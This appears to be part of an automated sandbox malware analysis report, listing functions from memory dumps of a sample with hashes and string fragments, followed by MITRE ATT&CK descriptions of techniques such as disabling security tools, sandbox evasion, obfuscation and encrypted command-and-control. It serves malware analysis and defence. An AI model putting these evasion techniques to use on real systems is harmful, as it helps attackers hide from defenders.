String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$sVYZ$Q<
API String ID: 0-3557550785
Opcode ID: 51e5c8f99fa79729b9b0c714d5de1e798ffad292d6f32505d62a53cf0017916c
Instruction ID: 8995944154562ee870c6d7dcd935156a9867e5894b20218f4f723866067a1f96
Opcode Fuzzy Hash: 51e5c8f99fa79729b9b0c714d5de1e798ffad292d6f32505d62a53cf0017916c
Instruction Fuzzy Hash: D1726A74A04229CFDB64DF58E998B9DB7B2FB98700F2081D9D41AAB354DB309E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0B398B79 Relevance: 11.9, Strings: 9, Instructions: 643COMMON

Download Yara Rule

Strings

L:*S, xrefs: 0B398F35
k8w[, xrefs: 0B398C45
Q<, xrefs: 0B399299
cEVT, xrefs: 0B399715
L:*S, xrefs: 0B398F55
qrA&, xrefs: 0B39963E
T}A, xrefs: 0B398C90
"F, xrefs: 0B398CC9
L:*S, xrefs: 0B398F2B

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$Q<
API String ID: 0-2839657297
Opcode ID: fc6f4e93c022ce4f1a29a66e65252fd62d86d20ce5d6a2eb2ffda3cb7591c2af
Instruction ID: 4b2e2c652a9e412fc0c4ed7cca7fdbf827039cde52e2cd3580e1961304d4b634
Opcode Fuzzy Hash: fc6f4e93c022ce4f1a29a66e65252fd62d86d20ce5d6a2eb2ffda3cb7591c2af
Instruction Fuzzy Hash: 38625B74A04229CFDB64DF58E998B9DB7B2FB98700F2081D9D41AAB354DB309E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0B398B70 Relevance: 11.9, Strings: 9, Instructions: 643COMMON

Download Yara Rule

Strings

L:*S, xrefs: 0B398F35
k8w[, xrefs: 0B398C45
Q<, xrefs: 0B399299
cEVT, xrefs: 0B399715
L:*S, xrefs: 0B398F55
qrA&, xrefs: 0B39963E
T}A, xrefs: 0B398C90
"F, xrefs: 0B398CC9
L:*S, xrefs: 0B398F2B

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$Q<
API String ID: 0-2839657297
Opcode ID: d52ddaf393f7fe6c1bacb96784934c91cfb723f2a34f34b3d9d3412f9ffa7b01
Instruction ID: 3b5afa296b7d5b21f09cc6fd61ff374a1532f869b62d62b142f20dfb78e74192
Opcode Fuzzy Hash: d52ddaf393f7fe6c1bacb96784934c91cfb723f2a34f34b3d9d3412f9ffa7b01
Instruction Fuzzy Hash: 26625A74A04229CFDB64DF58E998B9DB7B2FB98700F2081D9D41AAB354DB309E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0B398DB1 Relevance: 8.1, Strings: 6, Instructions: 551COMMON

Download Yara Rule

Strings

L:*S, xrefs: 0B398F35
Q<, xrefs: 0B399299
cEVT, xrefs: 0B399715
L:*S, xrefs: 0B398F55
qrA&, xrefs: 0B39963E
L:*S, xrefs: 0B398F2B

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: L:*S$L:*S$L:*S$cEVT$qrA&$Q<
API String ID: 0-725065920
Opcode ID: 81610a5997fbd2a985215d4da7434aa36f4f7a76897dd14f1e1e993fe6486880
Instruction ID: 47355aa7d724c1698a6cdcab577e70ca64794f45e6b29221ac1c47dbf226353d
Opcode Fuzzy Hash: 81610a5997fbd2a985215d4da7434aa36f4f7a76897dd14f1e1e993fe6486880
Instruction Fuzzy Hash: 19424974A04229CFDB64DF54E998BADB7B6FB98300F2081D9D41AAB754DB309E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0B398DA8 Relevance: 8.1, Strings: 6, Instructions: 551COMMON

Download Yara Rule

Strings

L:*S, xrefs: 0B398F35
Q<, xrefs: 0B399299
cEVT, xrefs: 0B399715
L:*S, xrefs: 0B398F55
qrA&, xrefs: 0B39963E
L:*S, xrefs: 0B398F2B

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: L:*S$L:*S$L:*S$cEVT$qrA&$Q<
API String ID: 0-725065920
Opcode ID: 325816012e7233af3ce371a4d4021f57715e4b496648963b09fa6f05eca7d6bf
Instruction ID: 19dd79e4c2eab62e566ee709caba3dd7a0adbb54dd5362a2868bfde7ca772c99
Opcode Fuzzy Hash: 325816012e7233af3ce371a4d4021f57715e4b496648963b09fa6f05eca7d6bf
Instruction Fuzzy Hash: 5B424974A04229CFDB64DF54E998BADB7B6FB98300F2081D9D41AAB754DB309E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01535CAB Relevance: 6.6, Strings: 5, Instructions: 308COMMON

Download Yara Rule

Strings

hE, xrefs: 01535ED3
5cgu, xrefs: 01536236
$#&b, xrefs: 01535D60
5cgu, xrefs: 01536240
#RH, xrefs: 01535D86

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: #RH$$#&b$5cgu$5cgu$hE
API String ID: 0-1348839357
Opcode ID: c27330d0e54f315e1651347a9ec16d9704bd29326bc8aea101eda34973aea1f3
Instruction ID: 490befbe51a689a3460a5fe193bd44150ca9ef14e90f4f00662d6fb9f711913a
Opcode Fuzzy Hash: c27330d0e54f315e1651347a9ec16d9704bd29326bc8aea101eda34973aea1f3
Instruction Fuzzy Hash: 8CD15F78B001158FDB58DFA8A81835EB7B3BBC9211F258469D80EEB758DF349D468F81

Uniqueness

Uniqueness Score: -1.00%

Function 0B398FD6 Relevance: 4.2, Strings: 3, Instructions: 462COMMON

Download Yara Rule

Strings

Q<, xrefs: 0B399299
cEVT, xrefs: 0B399715
qrA&, xrefs: 0B39963E

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: cEVT$qrA&$Q<
API String ID: 0-697639764
Opcode ID: f30e1a52a89ad47238820778cc439d9c80f539cd182e7a5c0dda4b14a8d3c07e
Instruction ID: 296014d53b9c180d2f177d41c2fc6235bf79fd78a1fa0a3ba545f2259a055c7a
Opcode Fuzzy Hash: f30e1a52a89ad47238820778cc439d9c80f539cd182e7a5c0dda4b14a8d3c07e
Instruction Fuzzy Hash: 3D224B74A04229CFDB64DF54E998B9DB7B6FB98300F2082D9D41AAB754DB309E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0B398FCD Relevance: 4.2, Strings: 3, Instructions: 462COMMON

Download Yara Rule

Strings

Q<, xrefs: 0B399299
cEVT, xrefs: 0B399715
qrA&, xrefs: 0B39963E

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: cEVT$qrA&$Q<
API String ID: 0-697639764
Opcode ID: 18e92bb393c5316f25d8f850902a8ee3d8593f645b3b76d559f717c616d360ff
Instruction ID: a0ae8d443f428c37f7f89bd11d66b58fb65202fa06e4520603888c40eaf63e24
Opcode Fuzzy Hash: 18e92bb393c5316f25d8f850902a8ee3d8593f645b3b76d559f717c616d360ff
Instruction Fuzzy Hash: 80224B74A04229CFDB64DF54E998B9DB7B6FB98300F2082D9D41AAB754DB309E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0B39943A Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

cEVT, xrefs: 0B399715
qrA&, xrefs: 0B39963E

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: cEVT$qrA&
API String ID: 0-3193502352
Opcode ID: 059796fe14ebf40d66d7aa2cbf078065ab6c1334f992c9e2ded1b1e258be65e5
Instruction ID: 03015fcb4b1a5ec4a6580e93f502b60f6b59d59cd2b299d7ab3e5c66b09add73
Opcode Fuzzy Hash: 059796fe14ebf40d66d7aa2cbf078065ab6c1334f992c9e2ded1b1e258be65e5
Instruction Fuzzy Hash: B0D11874A04229CFCB64DF54E988B9DB7B6FB98300F2086D9D41AAB754DB309E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0B399443 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

cEVT, xrefs: 0B399715
qrA&, xrefs: 0B39963E

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: cEVT$qrA&
API String ID: 0-3193502352
Opcode ID: a35959280cdd9b211f5b0ace54e75c179dfcd8b50bb891bfc404b2bb91ef3f8c
Instruction ID: ddab904980316ae1b705ee2dcafd8aedde3397eb17d25715cbc89b3fd855a329
Opcode Fuzzy Hash: a35959280cdd9b211f5b0ace54e75c179dfcd8b50bb891bfc404b2bb91ef3f8c
Instruction Fuzzy Hash: 78D11874A04229CFCB64DF54E988B9DB7B6FB98300F2086D9D41AAB754DB309E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 015367A0 Relevance: 2.8, Strings: 2, Instructions: 264COMMON

Download Yara Rule

Strings

?|, xrefs: 01536A61
d-9&, xrefs: 0153682C

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: d-9&$?|
API String ID: 0-3371686692
Opcode ID: 4d1fc1f39127d6e22506301c3e36cc7d394d1acd5cf665a68d7542b3f368bf41
Instruction ID: a93059bb3f92ff71963fd160ff7b6ce1c69278155b09aac2ad271563bb264f97
Opcode Fuzzy Hash: 4d1fc1f39127d6e22506301c3e36cc7d394d1acd5cf665a68d7542b3f368bf41
Instruction Fuzzy Hash: BBA1B170B006119BCB19CF69C5909AEF7E2BBC4304B68CA2ED0669F655D730EE05CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01536730 Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

?|, xrefs: 01536A61

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: ?|
API String ID: 0-604831152
Opcode ID: 2136b72fa93ccdc96ebb07d44acc7e56237ada642b32b68322576d0876ec1dd1
Instruction ID: 1e68e14bef72bfe51aca0dc5a80e3b2857243ee3761e659ba8448cb5ef4d577b
Opcode Fuzzy Hash: 2136b72fa93ccdc96ebb07d44acc7e56237ada642b32b68322576d0876ec1dd1
Instruction Fuzzy Hash: 01C1E371A046519FC716CF68C8905AAFBF2BFC53007688A6ED096DF256D730EE05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01533C59 Relevance: 1.4, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

ez, xrefs: 01533DCE

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: ez
API String ID: 0-1859683672
Opcode ID: c8d9e11ef8f1fd690e5541e44c155f20ab5592f40c0e75b6e08ca5074052e5bf
Instruction ID: b6dadea24c9ed5678dfffe3b59c75fbf0099cb1d72069fb1d3a19aaf704bd131
Opcode Fuzzy Hash: c8d9e11ef8f1fd690e5541e44c155f20ab5592f40c0e75b6e08ca5074052e5bf
Instruction Fuzzy Hash: 16712331604206CFC795CF69C8849AABBF5FFC2360B058D6AD056CF661D338E946CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01533D70 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

ez, xrefs: 01533DCE

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: ez
API String ID: 0-1859683672
Opcode ID: 904a42f060535b57981f84db8812e275886fbc639e429953cf83f0c6014e2175
Instruction ID: 8377bc30b796e41147a4f3697fc07f50dd429b48eb1f96e41d70a9ff3a9facda
Opcode Fuzzy Hash: 904a42f060535b57981f84db8812e275886fbc639e429953cf83f0c6014e2175
Instruction Fuzzy Hash: F0417C31A04606CFCB91CB69C989A6AB7F2FFC5360B14CD6AD06ACB654E234E941CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0153049F Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

fK , xrefs: 01530475

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID: fK
API String ID: 0-1704958051
Opcode ID: 2eae4cf0ce93e3653046207fe24d764f8e9abe7e94e498d0f92c5e381af1df62
Instruction ID: e090e83a2a813dc2b98130273a494d7b21585a1ee3d7c056d25ca28e99f7f4c3
Opcode Fuzzy Hash: 2eae4cf0ce93e3653046207fe24d764f8e9abe7e94e498d0f92c5e381af1df62
Instruction Fuzzy Hash: C531A774E00229CFCB54CF99C880AAEFBF2BB89300F548695E459EB245D730E981CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0153A420 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b761e6d1f157880b80c059f8bcfed93f2f4b30d40c95c2e4966c00b0910ada
Instruction ID: 3907a3d29f7b68e1581987d625e11782b0b30eb3ab72e18d9cc681a9b3eb7250
Opcode Fuzzy Hash: 69b761e6d1f157880b80c059f8bcfed93f2f4b30d40c95c2e4966c00b0910ada
Instruction Fuzzy Hash: C812C2B0525F459BF710CFA5E84A2893FA9B745318F544308F3A91FAE1DBB9118ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 01534D20 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11127995ef4e527f245412afca1dad79d8922f7d39ff5ca8e6d92b269afb69eb
Instruction ID: af0b9bad650f7457c4a178e587528c6b032fb0948d715426aeec0af5d2d56db3
Opcode Fuzzy Hash: 11127995ef4e527f245412afca1dad79d8922f7d39ff5ca8e6d92b269afb69eb
Instruction Fuzzy Hash: 14B1DE30A146158FCB26CB28C5849AEFBF2BFC9300B58CE2AD4569F659D735ED04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0B391249 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e326a03add220a23c85785aad074c72bfe4126b9e722b9f02a8a6f74112c670a
Instruction ID: 79668a5fffd40f6b7680db57724eff1d7e98def6b8aff2ea1eecef129e5fb7e2
Opcode Fuzzy Hash: e326a03add220a23c85785aad074c72bfe4126b9e722b9f02a8a6f74112c670a
Instruction Fuzzy Hash: B0D1F931C2075A8AC710EFA5C9906D9B7B5FF99300F509B9AE1093B225EB706AC9CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0B391258 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffa996f6b3cc44c93131ad2079c935caf8d065e8f3dfb5ba4c5a2ac9db42d5d1
Instruction ID: 781419a580577a2a49dca218f5828a5a16b9d0c66303457f318f8e3c5b5cc4f8
Opcode Fuzzy Hash: ffa996f6b3cc44c93131ad2079c935caf8d065e8f3dfb5ba4c5a2ac9db42d5d1
Instruction Fuzzy Hash: C5D1E931C2075A8AC710EFA5C9906D9B7B5FF99200F509B9AE5093B215FB706AC9CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01535160 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca779e2a04bd03b78715e157a46fd783f06f46a4f1bf6c5835491ee1342fd3a
Instruction ID: a3194aed747304a7523ee87b1fe6c4fa0dcadcc87160aea302b70bd46241e777
Opcode Fuzzy Hash: eca779e2a04bd03b78715e157a46fd783f06f46a4f1bf6c5835491ee1342fd3a
Instruction Fuzzy Hash: 3DA1BF31A246158BDB16CB68C5809AEF7F3BFC4304B18DA2AD056DB659E734FD04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015356D0 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90779e961a016288e2a3631deec89cb81277a4dca3259b26a4739efc14f146fb
Instruction ID: 1d47a62764ffb68dbf4785144f7eb2f5e4aff405511db28328ffee07e186c02e
Opcode Fuzzy Hash: 90779e961a016288e2a3631deec89cb81277a4dca3259b26a4739efc14f146fb
Instruction Fuzzy Hash: 47A1F330624626CBCB56CB68C5805AEFBF2BFC4301B18DE2AD0569F655E334EE04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0153A40F Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5f1b165008761397a6c2639724fdb3f5762a3cf8b7f0da0ac8a8b6602d9bc2
Instruction ID: 68c7c692d78a27f3de27fa1fdea08f7a1d70e4fc39ac1553238f545ef17c115d
Opcode Fuzzy Hash: 4e5f1b165008761397a6c2639724fdb3f5762a3cf8b7f0da0ac8a8b6602d9bc2
Instruction Fuzzy Hash: C7C106B0920B458BF710CFA5E84A1893FB9BB95318F544318E3652FAD0DFB9558ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 015347B8 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad1ae7c6e52cc49d0fee46416e8e670d30092682575405d803b95eca95713d49
Instruction ID: 0d392a637def2c3d5bfb5e30e9c92c0f9d46b6820dd0e52cc87e8af1c13574ff
Opcode Fuzzy Hash: ad1ae7c6e52cc49d0fee46416e8e670d30092682575405d803b95eca95713d49
Instruction Fuzzy Hash: 1571CF72F1525A8FCB44CF69C8915AAFBF6FBCA210B158426D905EF251C234DD12CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 015348A8 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009a33d683a54a267e3eb40110f50936288605a6bdb746ffc73a5a718afe8a69
Instruction ID: abfb0c7ea1c52663aa81b62b9636eb3062702b455c8efac13ca40b082fedcbfc
Opcode Fuzzy Hash: 009a33d683a54a267e3eb40110f50936288605a6bdb746ffc73a5a718afe8a69
Instruction Fuzzy Hash: D541C172F2525A8FCB44CF68C9915AEFBF2FBCA210B168526D505EF251C234DD11CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01532BBD Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519afa16e198dae87c7c0b26eb3ce66c8475b010bce7b62d47c79d08602dbca2
Instruction ID: f2979eda0b513cd59d0ac4bf7e397ea53b4f8ddd1f0589ad990fbae477e56c50
Opcode Fuzzy Hash: 519afa16e198dae87c7c0b26eb3ce66c8475b010bce7b62d47c79d08602dbca2
Instruction Fuzzy Hash: 223190B15487819FCB45CF34C8D44D6BBABFBD5220719C5A9EC904E60AD339B80ADB30

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
